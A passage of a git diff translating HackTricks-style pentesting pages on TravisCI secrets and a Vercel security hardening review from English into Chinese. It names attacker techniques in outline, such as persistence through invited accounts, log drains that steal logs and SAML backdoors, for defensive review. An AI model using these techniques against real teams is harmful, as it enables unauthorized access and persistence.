kubernetes? -- compromise other machines running in the same network? -- compromise new cloud credentials? +- 逃逸到主机? +- 破坏 kubernetes? +- 破坏同一网络中运行的其他机器? +- 破坏新的云凭证? -## References +## 参考 - [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) - [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md index 46b10bf38..73b45462a 100644 --- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md +++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md @@ -4,45 +4,42 @@ ## Access -TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI. +TravisCI 直接与不同的 git 平台集成,如 Github、Bitbucket、Assembla 和 Gitlab。它会要求用户授予 TravisCI 访问他想要与 TravisCI 集成的仓库的权限。 -For example, in Github it will ask for the following permissions: +例如,在 Github 中,它会请求以下权限: -- `user:email` (read-only) -- `read:org` (read-only) -- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. +- `user:email`(只读) +- `read:org`(只读) +- `repo`:授予对公共和私有仓库及组织的代码、提交状态、协作者和部署状态的读写访问权限。 ## Encrypted Secrets ### Environment Variables -In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. +在 TravisCI 中,与其他 CI 平台一样,可以 **在仓库级别保存秘密**,这些秘密将被加密保存,并在执行构建的机器的 **环境变量** 中 **解密并推送**。 ![](<../../images/image (203).png>) -It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). +可以指示 **秘密将可用的分支**(默认是所有)以及 TravisCI **是否应该隐藏其值**,如果它出现在 **日志中**(默认会隐藏)。 ### Custom Encrypted Secrets -For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository. - -You can access the public key of one repo with: +对于 **每个仓库**,TravisCI 生成一个 **RSA 密钥对**,**保留** **私钥**,并将仓库的 **公钥提供给** 有 **访问权限** 的人。 +您可以通过以下方式访问一个仓库的公钥: ``` travis pubkey -r / travis pubkey -r carlospolop/t-ci-test ``` - -Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. +然后,您可以使用此设置来**加密秘密并将其添加到您的 `.travis.yaml`**。这些秘密将在**构建运行时解密**并可在**环境变量**中访问。 ![](<../../images/image (139).png>) -Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings. +请注意,以这种方式加密的秘密不会出现在设置的环境变量列表中。 -### Custom Encrypted Files - -Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**: +### 自定义加密文件 +与之前一样,TravisCI 还允许**加密文件并在构建期间解密它们**: ``` travis encrypt-file super_secret.txt -r carlospolop/t-ci-test @@ -52,7 +49,7 @@ storing secure env variables for decryption Please add the following to your build script (before_install stage in your .travis.yml, for instance): - openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d +openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d Pro Tip: You can add it automatically by running with --add. @@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository. Make sure not to add super_secret.txt to the git repository. Commit all changes to your .travis.yml. ``` - -Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: +注意,当加密文件时,将在仓库中配置 2 个环境变量,如下所示: ![](<../../images/image (170).png>) -## TravisCI Enterprise +## TravisCI 企业版 -Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to. +Travis CI 企业版是 **Travis CI 的本地版本**,您可以在 **您的基础设施中部署**。可以将其视为 Travis CI 的“服务器”版本。使用 Travis CI 允许您在一个环境中启用易于使用的持续集成/持续部署 (CI/CD) 系统,您可以根据需要进行配置和安全设置。 -**Travis CI Enterprise consists of two major parts:** +**Travis CI 企业版由两个主要部分组成:** -1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc. -2. TCI **Worker** and build environment images (also called OS images). +1. TCI **服务**(或 TCI 核心服务),负责与版本控制系统的集成、授权构建、调度构建作业等。 +2. TCI **工作节点**和构建环境镜像(也称为操作系统镜像)。 -**TCI Core services require the following:** +**TCI 核心服务需要以下内容:** -1. A **PostgreSQL11** (or later) database. -2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required -3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details. +1. 一个 **PostgreSQL11**(或更高版本)数据库。 +2. 部署 Kubernetes 集群的基础设施;如果需要,可以在服务器集群中或单台机器上部署。 +3. 根据您的设置,您可能希望自行部署和配置某些组件,例如 RabbitMQ - 有关更多详细信息,请参见 [设置 Travis CI 企业版](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/)。 -**TCI Worker requires the following:** +**TCI 工作节点需要以下内容:** -1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**. -2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details. +1. 一个基础设施,可以在其中部署包含 **工作节点和链接的构建镜像** 的 Docker 镜像。 +2. 连接到某些 Travis CI 核心服务组件 - 有关更多详细信息,请参见 [设置工作节点](https://docs.travis-ci.com/user/enterprise/setting-up-worker/)。 -The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. +部署的 TCI 工作节点和构建环境操作系统镜像的数量将决定您基础设施中 Travis CI 企业版部署的总并发容量。 ![](<../../images/image (199).png>) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md index 16dc93da7..05d0a70bc 100644 --- a/src/pentesting-ci-cd/vercel-security.md +++ b/src/pentesting-ci-cd/vercel-security.md @@ -2,440 +2,436 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. +在 Vercel 中,**团队**是属于客户的完整 **环境**,而 **项目** 是一个 **应用程序**。 -For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). +对于 **Vercel** 的加固审查,您需要请求具有 **查看者角色权限** 的用户,或者至少对项目具有 **项目查看者权限** 以进行检查(如果您只需要检查项目而不需要检查团队配置)。 -## Project Settings +## 项目设置 -### General +### 一般 -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. +**目的:** 管理基本项目设置,如项目名称、框架和构建配置。 -#### Security Configurations: +#### 安全配置: -- **Transfer** - - **Misconfiguration:** Allows to transfer the project to another team - - **Risk:** An attacker could steal the project -- **Delete Project** - - **Misconfiguration:** Allows to delete the project - - **Risk:** Delete the prject +- **转移** +- **错误配置:** 允许将项目转移到另一个团队 +- **风险:** 攻击者可能会窃取项目 +- **删除项目** +- **错误配置:** 允许删除项目 +- **风险:** 删除项目 --- -### Domains +### 域名 -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. +**目的:** 管理自定义域名、DNS 设置和 SSL 配置。 -#### Security Configurations: +#### 安全配置: -- **DNS Configuration Errors** - - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - - **Risk:** Domain hijacking, traffic interception, and phishing attacks. -- **SSL/TLS Certificate Management** - - **Misconfiguration:** Using weak or expired SSL/TLS certificates. - - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. -- **DNSSEC Implementation** - - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. -- **Environment used per domain** - - **Misconfiguration:** Change the environment used by the domain in production. - - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. +- **DNS 配置错误** +- **错误配置:** 指向恶意服务器的错误 DNS 记录(A、CNAME)。 +- **风险:** 域名劫持、流量拦截和网络钓鱼攻击。 +- **SSL/TLS 证书管理** +- **错误配置:** 使用弱或过期的 SSL/TLS 证书。 +- **风险:** 易受中间人(MITM)攻击,危及数据完整性和机密性。 +- **DNSSEC 实施** +- **错误配置:** 未能启用 DNSSEC 或 DNSSEC 设置不正确。 +- **风险:** 增加 DNS 欺骗和缓存投毒攻击的易受攻击性。 +- **每个域名使用的环境** +- **错误配置:** 更改生产中域名使用的环境。 +- **风险:** 暴露潜在的秘密或不应在生产中可用的功能。 --- -### Environments +### 环境 -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. +**目的:** 定义不同的环境(开发、预览、生产),并具有特定的设置和变量。 -#### Security Configurations: +#### 安全配置: -- **Environment Isolation** - - **Misconfiguration:** Sharing environment variables across environments. - - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. -- **Access to Sensitive Environments** - - **Misconfiguration:** Allowing broad access to production environments. - - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. +- **环境隔离** +- **错误配置:** 在不同环境之间共享环境变量。 +- **风险:** 生产秘密泄露到开发或预览环境中,增加暴露风险。 +- **对敏感环境的访问** +- **错误配置:** 允许对生产环境的广泛访问。 +- **风险:** 未经授权的更改或访问实时应用程序,导致潜在的停机或数据泄露。 --- -### Environment Variables +### 环境变量 -**Purpose:** Manage environment-specific variables and secrets used by the application. +**目的:** 管理应用程序使用的特定于环境的变量和秘密。 -#### Security Configurations: +#### 安全配置: -- **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -- **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -- **Shared Environment Variables** - - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **暴露敏感变量** +- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。 +- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。 +- **敏感禁用** +- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 +- **共享环境变量** +- **错误配置:** 这些是在团队级别设置的环境变量,也可能包含敏感信息。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 --- ### Git -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. +**目的:** 配置 Git 存储库集成、分支保护和部署触发器。 -#### Security Configurations: +#### 安全配置: -- **Ignored Build Step (TODO)** - - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - - **Risk:** TBD +- **忽略构建步骤(TODO)** +- **错误配置:** 这个选项似乎允许配置一个 bash 脚本/命令,当在 Github 中推送新提交时执行,这可能允许 RCE。 +- **风险:** 待定 --- -### Integrations +### 集成 -**Purpose:** Connect third-party services and tools to enhance project functionalities. +**目的:** 连接第三方服务和工具以增强项目功能。 -#### Security Configurations: +#### 安全配置: -- **Insecure Third-Party Integrations** - - **Misconfiguration:** Integrating with untrusted or insecure third-party services. - - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. -- **Over-Permissioned Integrations** - - **Misconfiguration:** Granting excessive permissions to integrated services. - - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. -- **Lack of Integration Monitoring** - - **Misconfiguration:** Failing to monitor and audit third-party integrations. - - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. +- **不安全的第三方集成** +- **错误配置:** 与不受信任或不安全的第三方服务集成。 +- **风险:** 通过被破坏的集成引入漏洞、数据泄露或后门。 +- **过度授权的集成** +- **错误配置:** 授予集成服务过多的权限。 +- **风险:** 未经授权访问项目资源、数据操纵或服务中断。 +- **缺乏集成监控** +- **错误配置:** 未能监控和审计第三方集成。 +- **风险:** 延迟检测被破坏的集成,增加安全漏洞的潜在影响。 --- -### Deployment Protection +### 部署保护 -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. +**目的:** 通过各种保护机制确保部署安全,控制谁可以访问和部署到您的环境。 -#### Security Configurations: +#### 安全配置: -**Vercel Authentication** +**Vercel 身份验证** -- **Misconfiguration:** Disabling authentication or not enforcing team member checks. -- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. +- **错误配置:** 禁用身份验证或未强制执行团队成员检查。 +- **风险:** 未经授权的用户可以访问部署,导致数据泄露或应用程序滥用。 -**Protection Bypass for Automation** +**自动化的保护绕过** -- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. +- **错误配置:** 公开绕过秘密或使用弱秘密。 +- **风险:** 攻击者可以绕过部署保护,访问和操纵受保护的部署。 -**Shareable Links** +**可分享链接** -- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. +- **错误配置:** 不加选择地分享链接或未能撤销过期链接。 +- **风险:** 未经授权访问受保护的部署,绕过身份验证和 IP 限制。 -**OPTIONS Allowlist** +**OPTIONS 允许列表** -- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. +- **错误配置:** 允许过于宽泛的路径或敏感端点。 +- **风险:** 攻击者可以利用未保护的路径执行未经授权的操作或绕过安全检查。 -**Password Protection** +**密码保护** -- **Misconfiguration:** Using weak passwords or sharing them insecurely. -- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **错误配置:** 使用弱密码或不安全地共享密码。 +- **风险:** 如果密码被猜测或泄露,可能导致未经授权访问部署。 +- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。 -**Deployment Protection Exceptions** +**部署保护例外** -- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **错误配置:** 不小心将生产或敏感域添加到例外列表。 +- **风险:** 关键部署暴露给公众,导致数据泄露或未经授权访问。 +- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。 -**Trusted IPs** +**受信任的 IP** -- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. -- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -- **Note:** Available on the **Enterprise** plan. +- **错误配置:** 不正确地指定 IP 地址或 CIDR 范围。 +- **风险:** 合法用户被阻止或未经授权的 IP 获得访问。 +- **注意:** 在 **Enterprise** 计划中提供。 --- -### Functions +### 函数 -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. +**目的:** 配置无服务器函数,包括运行时设置、内存分配和安全策略。 -#### Security Configurations: +#### 安全配置: -- **Nothing** +- **无** --- -### Data Cache +### 数据缓存 -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. +**目的:** 管理缓存策略和设置,以优化性能和控制数据存储。 -#### Security Configurations: +#### 安全配置: -- **Purge Cache** - - **Misconfiguration:** It allows to delete all the cache. - - **Risk:** Unauthorized users deleting the cache leading to a potential DoS. +- **清除缓存** +- **错误配置:** 允许删除所有缓存。 +- **风险:** 未经授权的用户删除缓存,导致潜在的 DoS。 --- -### Cron Jobs +### 定时任务 -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. +**目的:** 安排自动化任务和脚本在指定时间间隔运行。 -#### Security Configurations: +#### 安全配置: -- **Disable Cron Job** - - **Misconfiguration:** It allows to disable cron jobs declared inside the code - - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) +- **禁用定时任务** +- **错误配置:** 允许禁用代码中声明的定时任务。 +- **风险:** 服务潜在中断(取决于定时任务的目的) --- -### Log Drains +### 日志排水 -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. +**目的:** 配置外部日志服务以捕获和存储应用程序日志以进行监控和审计。 -#### Security Configurations: +#### 安全配置: -- Nothing (managed from teams settings) +- 无(由团队设置管理) --- -### Security +### 安全 -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. +**目的:** 各种影响项目访问、源保护等的安全相关设置的中央中心。 -#### Security Configurations: +#### 安全配置: -**Build Logs and Source Protection** +**构建日志和源保护** -- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. +- **错误配置:** 禁用保护或公开 `/logs` 和 `/src` 路径。 +- **风险:** 未经授权访问构建日志和源代码,导致信息泄露和潜在漏洞利用。 -**Git Fork Protection** +**Git Fork 保护** -- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. +- **错误配置:** 允许未经授权的拉取请求而没有适当的审查。 +- **风险:** 恶意代码可能被合并到代码库中,引入漏洞或后门。 -**Secure Backend Access with OIDC Federation** +**使用 OIDC 联邦安全后端访问** -- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. -- **Risk:** Unauthorized access to backend services through flawed authentication flows. +- **错误配置:** 错误设置 OIDC 参数或使用不安全的发行者 URL。 +- **风险:** 通过错误的身份验证流程未经授权访问后端服务。 -**Deployment Retention Policy** +**部署保留策略** -- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. +- **错误配置:** 设置保留期限过短(丢失部署历史)或过长(不必要的数据保留)。 +- **风险:** 在需要时无法执行回滚,或由于旧部署增加数据暴露风险。 -**Recently Deleted Deployments** +**最近删除的部署** -- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -- **Risk:** Loss of critical deployment history, hindering audits and rollbacks. +- **错误配置:** 不监控已删除的部署或仅依赖自动删除。 +- **风险:** 丢失关键部署历史,妨碍审计和回滚。 --- -### Advanced +### 高级 -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. +**目的:** 访问额外的项目设置,以微调配置和增强安全性。 -#### Security Configurations: +#### 安全配置: -**Directory Listing** +**目录列表** -- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. +- **错误配置:** 启用目录列表允许用户在没有索引文件的情况下查看目录内容。 +- **风险:** 暴露敏感文件、应用程序结构和潜在攻击入口。 --- -## Project Firewall +## 项目防火墙 -### Firewall +### 防火墙 -#### Security Configurations: +#### 安全配置: -**Enable Attack Challenge Mode** +**启用攻击挑战模式** -- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -- **Risk:** Potential user experience problems. +- **错误配置:** 启用此功能提高了 Web 应用程序对 DoS 的防御,但以可用性为代价。 +- **风险:** 潜在的用户体验问题。 -### Custom Rules & IP Blocking +### 自定义规则和 IP 阻止 -- **Misconfiguration:** Allows to unblock/block traffic -- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic +- **错误配置:** 允许解除/阻止流量。 +- **风险:** 潜在的 DoS 允许恶意流量或阻止良性流量。 --- -## Project Deployment +## 项目部署 -### Source +### 源 -- **Misconfiguration:** Allows access to read the complete source code of the application -- **Risk:** Potential exposure of sensitive information +- **错误配置:** 允许访问读取应用程序的完整源代码。 +- **风险:** 潜在暴露敏感信息。 -### Skew Protection +### 偏差保护 -- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future +- **错误配置:** 此保护确保客户端和服务器应用程序始终使用相同版本,因此不会出现客户端使用与服务器不同版本的不同步情况。 +- **风险:** 禁用此功能(如果启用)可能导致未来新部署中的 DoS 问题。 --- -## Team Settings +## 团队设置 -### General +### 一般 -#### Security Configurations: +#### 安全配置: -- **Transfer** - - **Misconfiguration:** Allows to transfer all the projects to another team - - **Risk:** An attacker could steal the projects -- **Delete Project** - - **Misconfiguration:** Allows to delete the team with all the projects - - **Risk:** Delete the projects +- **转移** +- **错误配置:** 允许将所有项目转移到另一个团队。 +- **风险:** 攻击者可能会窃取项目。 +- **删除项目** +- **错误配置:** 允许删除团队及其所有项目。 +- **风险:** 删除项目。 --- -### Billing +### 计费 -#### Security Configurations: +#### 安全配置: -- **Speed Insights Cost Limit** - - **Misconfiguration:** An attacker could increase this number - - **Risk:** Increased costs +- **速度洞察成本限制** +- **错误配置:** 攻击者可能会增加此数字。 +- **风险:** 成本增加。 --- -### Members +### 成员 -#### Security Configurations: +#### 安全配置: -- **Add members** - - **Misconfiguration:** An attacker could maintain persitence inviting an account he control - - **Risk:** Attacker persistence -- **Roles** - - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - - **Risk**: Increate the exposure of the Vercel Team +- **添加成员** +- **错误配置:** 攻击者可能会通过邀请他控制的帐户来维持持久性。 +- **风险:** 攻击者持久性。 +- **角色** +- **错误配置:** 授予不需要的人员过多权限增加了 Vercel 配置的风险。检查所有可能的角色 [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)。 +- **风险:** 增加 Vercel 团队的暴露。 --- -### Access Groups +### 访问组 -An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. +在 Vercel 中,**访问组**是具有预定义角色分配的项目和团队成员的集合,能够在多个项目之间实现集中和简化的访问管理。 -**Potential Misconfigurations:** +**潜在错误配置:** -- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. +- **过度授权成员:** 分配的角色权限超过必要,导致未经授权的访问或操作。 +- **不当角色分配:** 错误分配与团队成员职责不符的角色,导致特权升级。 +- **缺乏项目隔离:** 未能分离敏感项目,允许比预期更广泛的访问。 +- **管理不足的组:** 未定期审查或更新访问组,导致过时或不当的访问权限。 +- **不一致的角色定义:** 在不同访问组中使用不一致或不清晰的角色定义,导致混淆和安全漏洞。 --- -### Log Drains +### 日志排水 -#### Security Configurations: +#### 安全配置: -- **Log Drains to third parties:** - - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - - **Risk:** Partial persistence +- **向第三方的日志排水:** +- **错误配置:** 攻击者可能会配置日志排水以窃取日志。 +- **风险:** 部分持久性。 --- -### Security & Privacy +### 安全与隐私 -#### Security Configurations: +#### 安全配置: -- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - - **Misconfiguration:** - - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. - - **Risks:** - - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - - **Misconfiguration:** Not adding critical Git scopes to the protected list. -- **Risks:** - - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - - **Risks:** - - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - - **Data Breach:** Sensitive information like API keys and credentials could be leaked. -- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - - **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - - **Risks:** - - **Privacy Violations:** Exposure of sensitive user activities and data. - - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. -- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - - **Risk:** Maintain persistence -- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - - **Misconfiguration:** Leaving IP address visibility enabled without necessity. - - **Risks:** - - **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - - **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - - **Risks:** - - **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - - **Operational Disruptions:** Loss of service availability for certain regions or clients. +- **团队电子邮件域:** 配置后,此设置会自动邀请以指定域(例如 `mydomain.com`)结尾的 Vercel 个人帐户在注册时和仪表板上加入您的团队。 +- **错误配置:** +- 指定错误的电子邮件域或在团队电子邮件域设置中拼写错误的域。 +- 使用常见电子邮件域(例如 `gmail.com`、`hotmail.com`)而不是公司特定域。 +- **风险:** +- **未经授权的访问:** 来自意外域的用户可能会收到加入您团队的邀请。 +- **数据暴露:** 潜在暴露敏感项目信息给未经授权的个人。 +- **受保护的 Git 范围:** 允许您为团队添加最多 5 个 Git 范围,以防止其他 Vercel 团队从受保护范围部署存储库。多个团队可以指定相同的范围,允许两个团队访问。 +- **错误配置:** 未将关键 Git 范围添加到受保护列表。 +- **风险:** +- **未经授权的部署:** 其他团队可能未经授权从您组织的 Git 范围部署存储库。 +- **知识产权暴露:** 专有代码可能被部署并在您的团队之外访问。 +- **环境变量策略:** 强制执行团队环境变量的创建和编辑策略。具体而言,您可以强制所有环境变量作为 **敏感环境变量** 创建,这只能由 Vercel 的部署系统解密。 +- **错误配置:** 保持对敏感环境变量的强制执行禁用。 +- **风险:** +- **秘密暴露:** 环境变量可能被未经授权的团队成员查看或编辑。 +- **数据泄露:** 敏感信息如 API 密钥和凭据可能被泄露。 +- **审计日志:** 提供团队活动的导出,最长可达 90 天。审计日志有助于监控和跟踪团队成员执行的操作。 +- **错误配置:**\ +授予未经授权的团队成员访问审计日志的权限。 +- **风险:** +- **隐私侵犯:** 暴露敏感用户活动和数据。 +- **篡改日志:** 恶意行为者可能会更改或删除日志以掩盖其踪迹。 +- **SAML 单点登录:** 允许为您的团队自定义 SAML 身份验证和目录同步,支持与身份提供者(IdP)集成以实现集中身份验证和用户管理。 +- **错误配置:** 攻击者可能会在设置 SAML 参数(如实体 ID、SSO URL 或证书指纹)时后门团队。 +- **风险:** 维持持久性。 +- **IP 地址可见性:** 控制 IP 地址是否在监控查询和日志排水中显示,这在某些数据保护法律下可能被视为个人信息。 +- **错误配置:** 在没有必要的情况下保持 IP 地址可见性启用。 +- **风险:** +- **隐私侵犯:** 不符合数据保护法规(如 GDPR)。 +- **法律后果:** 由于处理个人数据不当而可能面临罚款和处罚。 +- **IP 阻止:** 允许配置 Vercel 应该阻止请求的 IP 地址和 CIDR 范围。被阻止的请求不会计入您的账单。 +- **错误配置:** 可能被攻击者滥用以允许恶意流量或阻止合法流量。 +- **风险:** +- **对合法用户的服务拒绝:** 阻止有效用户或合作伙伴的访问。 +- **操作中断:** 某些地区或客户的服务可用性丧失。 --- -### Secure Compute +### 安全计算 -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. +**Vercel 安全计算** 通过建立具有专用 IP 地址的隔离网络,启用 Vercel 函数与后端环境(例如数据库)之间的安全、私密连接。这消除了公开暴露后端服务的需要,增强了安全性、合规性和隐私。 -#### **Potential Misconfigurations and Risks** +#### **潜在错误配置和风险** -1. **Incorrect AWS Region Selection** - - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - - **Risk:** Increased latency, potential 